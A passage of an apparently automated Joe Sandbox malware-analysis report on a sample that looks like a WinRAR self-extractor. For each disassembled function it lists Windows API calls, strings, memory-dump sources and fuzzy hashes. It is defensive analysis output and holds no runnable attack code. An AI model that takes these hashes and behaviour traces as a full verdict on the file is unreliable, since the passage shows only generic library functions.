                                                              • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00427F69,?,?,?,?,?,?,?), ref: 0042A4BF
                                                              • CloseHandle.KERNEL32(?,?,?,00000800,?,00427F69,?,?,?,?,?,?,?,?,?,?), ref: 0042A4C6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$Create$CloseHandleTime
                                                              • String ID:
                                                              • API String ID: 2287278272-0
                                                              • Opcode ID: 84b997ad9582c42c472958012bc162ae74de5d64530f274c47e388fcc9d4b2c9
                                                              • Instruction ID: efb69677bf1f6820b3fa805f1f07873f39754d3ac0b8c7f9490cc2258ff2ca8d
                                                              • Opcode Fuzzy Hash: 84b997ad9582c42c472958012bc162ae74de5d64530f274c47e388fcc9d4b2c9
                                                              • Instruction Fuzzy Hash: E241DE302483919BE721EE24ED45BAFBBE4AB84704F44091EB9D0D32D1C6A8DA1CDB57
                                                              Function 0044C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004491E0,?,00000000,?,00000001,?,?,00000001,004491E0,?), ref: 0044C9D5
                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044CA5E
                                                              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00446CBE,?), ref: 0044CA70
                                                              • __freea.LIBCMT ref: 0044CA79
                                                                • Part of subcall function 00448E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0044CA2C,00000000,?,00446CBE,?,00000008,?,004491E0,?,?,?), ref: 00448E38
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                              • String ID:
                                                              • API String ID: 2652629310-0
                                                              • Opcode ID: 349491cc818d6449e03f803de7db94318ee46e274d59efa058e72317a6fc677c
                                                              • Instruction ID: 1502723540f7c433fd2d1f278d88104a500a110982639bf5dfd7f795de9c6d82
                                                              • Opcode Fuzzy Hash: 349491cc818d6449e03f803de7db94318ee46e274d59efa058e72317a6fc677c
                                                              • Instruction Fuzzy Hash: 2931D072A0120AABEF25CF75CC81EAF7BA5EB01310F08412AFC04E6251EB39DD50CB94
                                                              Function 0043A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDC.USER32(00000000), ref: 0043A666
                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0043A675
                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0043A683
                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0043A691
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: CapsDevice$Release
                                                              • String ID:
                                                              • API String ID: 1035833867-0
                                                              • Opcode ID: a4198f0014e5bac8a0d22ecc01612fa4a61f31e1ea99470088d9fc9212309bd6
                                                              • Instruction ID: f3d8a6d03d35ead4db4f4575bc5d9a995aa9150e6e06fb9924f04469e10dd1a1
                                                              • Opcode Fuzzy Hash: a4198f0014e5bac8a0d22ecc01612fa4a61f31e1ea99470088d9fc9212309bd6
                                                              • Instruction Fuzzy Hash: C8E01231942721B7D3615F61BC0EB8F3F54AB07F53F014629FA05AA1D4EFB486008BAA
                                                              Function 0043D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: .lnk$dC
                                                              • API String ID: 2691759472-1253457154
                                                              • Opcode ID: 5656ac8ae116ee8ee0a9a7b4bb495613b0bb63cd8d9278f530a17dd0d73e1c3e
                                                              • Instruction ID: 9b1f5087b5fd64da9f95ab37d24ff3280083fa8ba6b0271ab09f2aae13c88a3e
                                                              • Opcode Fuzzy Hash: 5656ac8ae116ee8ee0a9a7b4bb495613b0bb63cd8d9278f530a17dd0d73e1c3e
                                                              • Instruction Fuzzy Hash: 10A15E72D001299ADF24DBA0DD45EFB73FCAF48304F0895E7B509E3141EE789A858B69
                                                              Function 004275DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 004275E3
                                                                • Part of subcall function 004305DA: _wcslen.LIBCMT ref: 004305E0
                                                                • Part of subcall function 0042A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0042A598
                                                              • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0042777F
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A501
                                                                • Part of subcall function 0042A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0042A325,?,?,?,0042A175,?,00000001,00000000,?,?), ref: 0042A532
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                              • String ID: :
                                                              • API String ID: 3226429890-336475711
                                                              • Opcode ID: 8a9d3b979d4c2a3d87abce2751f1265e6c65dfe5770f9a3cf82350c6ceeb11a0
                                                              • Instruction ID: 2c275ec2eb6e112676c14a7489795bd92feb39e8ab79a4a2394ec3927ca9be72
                                                              • Opcode Fuzzy Hash: 8a9d3b979d4c2a3d87abce2751f1265e6c65dfe5770f9a3cf82350c6ceeb11a0
                                                              • Instruction Fuzzy Hash: 7541B471A00128AAEB21EB61DC55EDFB37CAF45304F8040DBB605A2192DB785F85CF69
                                                              Function 0042B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: *
                                                              • API String ID: 2691759472-163128923
                                                              • Opcode ID: 85bb34213e1ea3a1cb2b06d73c0ff982b84e6fa9fc987e829ddeecd777c28be0
                                                              • Instruction ID: 4b49861ad48eb75fde978ceaf3bdd805ed286fc076e18cd7fdf4c7e4dc150822
                                                              • Opcode Fuzzy Hash: 85bb34213e1ea3a1cb2b06d73c0ff982b84e6fa9fc987e829ddeecd777c28be0
                                                              • Instruction Fuzzy Hash: CA3135227042319A8A30FA01B98267B63E4DFA0B54BD4811FFD8443243E76D8D4293EA
                                                              Function 0043B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: }
                                                              • API String ID: 176396367-4239843852
                                                              • Opcode ID: 810b37d6c5f0ff79d115bb5f193bd02c204e607a57a4f70bcfae3ffc079abdfc
                                                              • Instruction ID: 52b36ee8bb9ce7225736109d2b71fa1bb5fecaa19fd7d4d3abf09f497cfc0573
                                                              • Opcode Fuzzy Hash: 810b37d6c5f0ff79d115bb5f193bd02c204e607a57a4f70bcfae3ffc079abdfc
                                                              • Instruction Fuzzy Hash: 4621FF329053066ADB31EA65D841B6FB3DCDF98718F10142FF68082241EB6C9D4886EA
                                                              Function 0042F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0042F2E4
                                                                • Part of subcall function 0042F2C5: GetProcAddress.KERNEL32(004681C8,CryptUnprotectMemory), ref: 0042F2F4
                                                              • GetCurrentProcessId.KERNEL32(?,?,?,0042F33E), ref: 0042F3D2
                                                              Strings
                                                              • CryptProtectMemory failed, xrefs: 0042F389
                                                              • CryptUnprotectMemory failed, xrefs: 0042F3CA
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CurrentProcess
                                                              • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                              • API String ID: 2190909847-396321323
                                                              • Opcode ID: 909584f335eba4d6cc40e0e8ce2011f95b6aa2c659d32ff916a6221232cfe037
                                                              • Instruction ID: 3a71e6adf2ce6cbae21935ae1323154ba7e467451e085b3c1905aae03d91ce24
                                                              • Opcode Fuzzy Hash: 909584f335eba4d6cc40e0e8ce2011f95b6aa2c659d32ff916a6221232cfe037
                                                              • Instruction Fuzzy Hash: F5112431700238ABDF21AF21E80166E3764FF05761B90427BFC019B351DA7C9D05869D
                                                              Function 0043101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNEL32(00000000,00010000,00431160,?,00000000,00000000), ref: 00431043
                                                              • SetThreadPriority.KERNEL32(?,00000000), ref: 0043108A
                                                                • Part of subcall function 00426C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00426C54
                                                                • Part of subcall function 00426DCB: _wcschr.LIBVCRUNTIME ref: 00426E0A
                                                                • Part of subcall function 00426DCB: _wcschr.LIBVCRUNTIME ref: 00426E19
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                                              • String ID: CreateThread failed
                                                              • API String ID: 2706921342-3849766595
                                                              • Opcode ID: fceeae7b0e377fe1741550a06bd753862cc722493d84b073acea579b37f46f79
                                                              • Instruction ID: ae02e0e7e36dbd11e7979ddddce13518e00c6ad904b3f3ebb4bc1310d83ce720
                                                              • Opcode Fuzzy Hash: fceeae7b0e377fe1741550a06bd753862cc722493d84b073acea579b37f46f79
                                                              • Instruction Fuzzy Hash: 00014E753003096FD7346F24AC41B76B368EB44751F20142FFB46526E1DEA4AC84422C
                                                              Function 0042C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcschr
                                                              • String ID: <9E$?*<>|"
                                                              • API String ID: 2691759472-4125611791
                                                              • Opcode ID: 33df98e2ada5b9d555d0330d9b67d59bc73022a607effa42922389a5d58b2d2d
                                                              • Instruction ID: 88574ecc51c8f82c5c7e7e884e6be23178cc5f649ac4736f40622d3b2045bb21
                                                              • Opcode Fuzzy Hash: 33df98e2ada5b9d555d0330d9b67d59bc73022a607effa42922389a5d58b2d2d
                                                              • Instruction Fuzzy Hash: BDF0D153B45321C1C7301EA9B88173BB3E4EF95720FB4081FE5C8873C2E6A988C082AD
                                                              Function 0043DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen
                                                              • String ID: Software\WinRAR SFX$C
                                                              • API String ID: 176396367-1432986629
                                                              • Opcode ID: aac71e1c8e7a6136af646ce862451e13ac45d1a82587d03c345f652b219e5d40
                                                              • Instruction ID: 7f7936cd8acaa6f25d66e4768d556975a37852d77616627f4e23de06a3aca46f
                                                              • Opcode Fuzzy Hash: aac71e1c8e7a6136af646ce862451e13ac45d1a82587d03c345f652b219e5d40
                                                              • Instruction Fuzzy Hash: CD01B131800118BAEB219F51DC0AFDF7F7CEB09795F000066F509A00A0DBB49A98CBA5
                                                              Function 0043AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0042C29A: _wcslen.LIBCMT ref: 0042C2A2
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00431FE5
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00431FF6
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00432006
                                                                • Part of subcall function 00431FDD: _wcslen.LIBCMT ref: 00432014
                                                                • Part of subcall function 00431FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0042B371,?,?,00000000,?,?,?), ref: 0043202F
                                                                • Part of subcall function 0043AC04: SetCurrentDirectoryW.KERNELBASE(?,0043AE72,C:\Users\user\Desktop,00000000,0046946A,00000006), ref: 0043AC08
                                                              • _wcslen.LIBCMT ref: 0043AE8B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareCurrentDirectoryString
                                                              • String ID: <C$C:\Users\user\Desktop
                                                              • API String ID: 521417927-578235079
                                                              • Opcode ID: cf969c2a0484dc8e3e42e6c4258439afc56deda6ef55fac81085564429a32498
                                                              • Instruction ID: d78cfffb0cc559192a624c742f5ce6d810ef219264111bcacb70e1f4b0aed337
                                                              • Opcode Fuzzy Hash: cf969c2a0484dc8e3e42e6c4258439afc56deda6ef55fac81085564429a32498
                                                              • Instruction Fuzzy Hash: AB015271D4021895DF10ABA5DD0AEDF73BCAF0C705F00146BF545E3191EBB896548AAA
                                                              Function 0044BB4E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004497E5: GetLastError.KERNEL32(?,00461030,00444674,00461030,?,?,00443F73,00000050,?,00461030,00000200), ref: 004497E9
                                                                • Part of subcall function 004497E5: _free.LIBCMT ref: 0044981C
                                                                • Part of subcall function 004497E5: SetLastError.KERNEL32(00000000,?,00461030,00000200), ref: 0044985D
                                                                • Part of subcall function 004497E5: _abort.LIBCMT ref: 00449863
                                                              • _abort.LIBCMT ref: 0044BB80
                                                              • _free.LIBCMT ref: 0044BBB4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast_abort_free
                                                              • String ID: pE
                                                              • API String ID: 289325740-674470523
                                                              • Opcode ID: e01bd2c71deaf8f7c1c8e226d4e210c709adedbda5e9b55cd93c01009fce8ce5
                                                              • Instruction ID: 553a0a398e34879d2bfe07e019a3c2fa9af326f7037b7957623a2c1696f25476
                                                              • Opcode Fuzzy Hash: e01bd2c71deaf8f7c1c8e226d4e210c709adedbda5e9b55cd93c01009fce8ce5
                                                              • Instruction Fuzzy Hash: C001A531D01B61DBEB269F5A840261EB761FB04725B14011FE96467B92CB2CBE018BCD
                                                              Function 0043B425 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: Malloc
                                                              • String ID: (C$ZC
                                                              • API String ID: 2696272793-784503434
                                                              • Opcode ID: 5735515104e6a4ff6b86255d70329cb916e3d1bb6081ae29a56ce2e84cdb1991
                                                              • Instruction ID: dfb42b45ff1b072af0bb12a1f5b7a72f459752002146aacd766500b1c91f562b
                                                              • Opcode Fuzzy Hash: 5735515104e6a4ff6b86255d70329cb916e3d1bb6081ae29a56ce2e84cdb1991
                                                              • Instruction Fuzzy Hash: C4016D76600118FF9F059FB0DD49CEE7B6DEF19345B100569B906D7120E731AA44DBA4
                                                              Function 00448268 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0044BF30: GetEnvironmentStringsW.KERNEL32 ref: 0044BF39
                                                                • Part of subcall function 0044BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044BF5C
                                                                • Part of subcall function 0044BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044BF82
                                                                • Part of subcall function 0044BF30: _free.LIBCMT ref: 0044BF95
                                                                • Part of subcall function 0044BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044BFA4
                                                              • _free.LIBCMT ref: 004482AE
                                                              • _free.LIBCMT ref: 004482B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1672961643.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                              • Associated: 00000000.00000002.1672926766.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1672997884.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.000000000045E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673016188.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1673074787.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_420000_EjS7Q5fFCE.jbxd
                                                              Similarity
                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                              • String ID: 0"H
                                                              • API String ID: 400815659-77574912
